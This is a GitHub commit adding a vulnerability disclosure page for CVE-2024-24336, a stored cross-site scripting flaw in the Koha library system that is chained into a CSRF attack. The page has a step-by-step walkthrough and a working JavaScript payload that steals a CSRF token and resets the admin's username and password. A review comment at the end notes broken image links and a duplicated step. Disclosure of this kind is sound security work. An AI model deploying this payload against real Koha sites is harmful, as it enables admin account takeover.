Add files via upload
nitipoom-jar authored Feb 6, 2024
0 parents commit 1e7e7ff
Showing 9 changed files with 726 additions and 0 deletions.
Binary file added 0.png
Binary file added 1.png
Binary file added 2.png
Binary file added 3.png
Binary file added 4.png
Binary file added 5.png
Binary file added 6.gif
178 changes: 178 additions & 0 deletions index.html
@@ -0,0 +1,178 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="styles.css">
<title>CVE-2024-24336</title>
</head>
<body>
<div class="green snipcss-3NIWg">
<div class="container center headings--one-size">
<header class="header">
<div class="header__inner">
<div class="header__logo">
<a href="#">
<div class="logo">
Quantiano
</div>
</a>
</div>
<ul class="menu menu--mobile">
<li>
<ul class="menu__dropdown">
<li>
</li>
<li>
</li>
</ul>
</li>
</ul>
</div>
<nav class="navigation-menu">
<ul class="navigation-menu__inner menu--desktop">
</ul>
</nav>
</header>
<div class="content">
<article class="post">
<h1 class="post-title">
<a href="#">
CVE-2024-24336
</a>
</h1>
<div class="post-meta">
<time class="post-date">
2024-02-06
</time>
<span class="post-author">
Nitipoom Jaroonchaipipat
</span>
</div><br>
<hr>
<div class="post-content">
<div>
<h2 id="#">
Product detail
<a href="#" class="hanchor" arialabel="Anchor">
</a>
</h2>
<ui>Affected product: Koha</ui><br>
<ui>Affected version: 23.05.05.00 (This vulnerability was discovered on November 2023)</ui><br>
<ui>Affected components: '/members/moremember.pl' and ‘/members/members-home.pl’</ui><br><br>
<p class="image-description">
A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version <= 23.05.05 allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components.
</p>
<hr>
<h2 id="proof-of-concept">
Prerequisite
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor">
</a>
</h2>
<p >
Install Koha from official Koha Github repository
<a href="https://github.com/Koha-Community/Koha" target="_blank">
GitHub page
</a><br>
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/0.png"><br>
<p class="image-description">Installed Koha version 23.05.05</p><br>

<hr>

<h2 id="proof-of-concept">
Exploitation
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor">
</a>
</h2>

<p class="image-description">
1. We have 2 roles in the system. lead_admin and patrons_staff
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/1.jpg"><br><br>

<p class="image-description">
2. Patrons_staff can only staff access into this web portal and add, modify, and view patron only
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/2.jpg"><br><br>

<p class="image-description">
3. But patrons_staff with granted won’t be able to edit username for any user except the system admin (same level as default admin by the system)
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/3.jpg"><br><br>

<p class="image-description">
4. Try with a simple xss payload on affected field
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br>

<p class="image-description">
4. Try with a simple xss payload on affected field
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br>

<p class="image-description">
5. Change from xss popup message to csrf for impact, since cookie had been set with httponly flag, so we couldn’t steal it.
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/5.jpg"><br><br>


<code>
<xmp>
<script>var req = new XMLHttpRequest(); req.open('GET', '/cgi-bin/koha/members/member-password.pl?member=1', true);
req.onreadystatechange = function() { if (req.readyState === 4 && req.status === 200) {
var tokenMatch = req.responseText.match(/<input type="hidden" name="csrf_token" value="([^"]*)"/);
if (tokenMatch) { alert('CSRF Token: ' + tokenMatch[1]); var forgedReq = new XMLHttpRequest();
forgedReq.open('POST', 'http://127.0.0.1:7002/cgi-bin/koha/members/member-password.pl', true);
forgedReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
forgedReq.send('destination=&borrowernumber=1&member=1&newuserid=pwned_leadadmin&newpassword=P@ssw0rd&newpassword2=P@ssw0rd&csrf_token=' +
encodeURIComponent(tokenMatch[1])); } } }; req.send();</script>
</xmp>
</code>

<p class="image-description">
5. The above javascript code will force user send request along with CSRF token, which we will change username and password for default admin which has a number of 1
</p><br><br>

<p class="image-description">
6. Exploitation in gif shows that malicious staff delivered csrf attack to lead admin successful and changed their username
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/6.gif"><br><br>



</div>
</div>
</article>
</div>
<footer class="footer">
<div class="footer__inner">
<div class="copyright">
<span>
© 2023 Powered by
<a href="https://gohugo.io">
Hugo
</a>
</span>
<span>
::
<a href="https://github.com/panr/hugo-theme-terminal" target="_blank">
Theme
</a>
made by
<a href="https://github.com/panr" target="_blank">
panr
</a>
</span>
</div>
</div>
</footer>
</body>
</html>
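Review bot: the `<img>` tags in the Exploitation section point at `1.jpg` through `5.jpg`, but this commit adds `1.png` through `5.png` (only `0.png` and `6.gif` match), so those screenshots will not render on the published page; fix the extensions. Step 4 ("Try with a simple xss payload on affected field" plus its image) is pasted twice, and "5." numbers both the payload-change step and the explanation of the script, so the walkthrough should be renumbered 1 to 7. The markup also needs cleanup: `<ui>` is not an HTML element (use `<ul><li>` or `<p>`), `arialabel` should be `aria-label`, `<h2 id="#">` is not a usable anchor, and `id="proof-of-concept"` is assigned to both the Prerequisite and Exploitation headings, so the second anchor is unreachable. For an advisory page the product section should also state the patched Koha release and link the vendor bug report so readers can verify the fix, and the version line is inconsistent between `23.05.05.00` and `<= 23.05.05`.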
0 comments on commit 1e7e7ff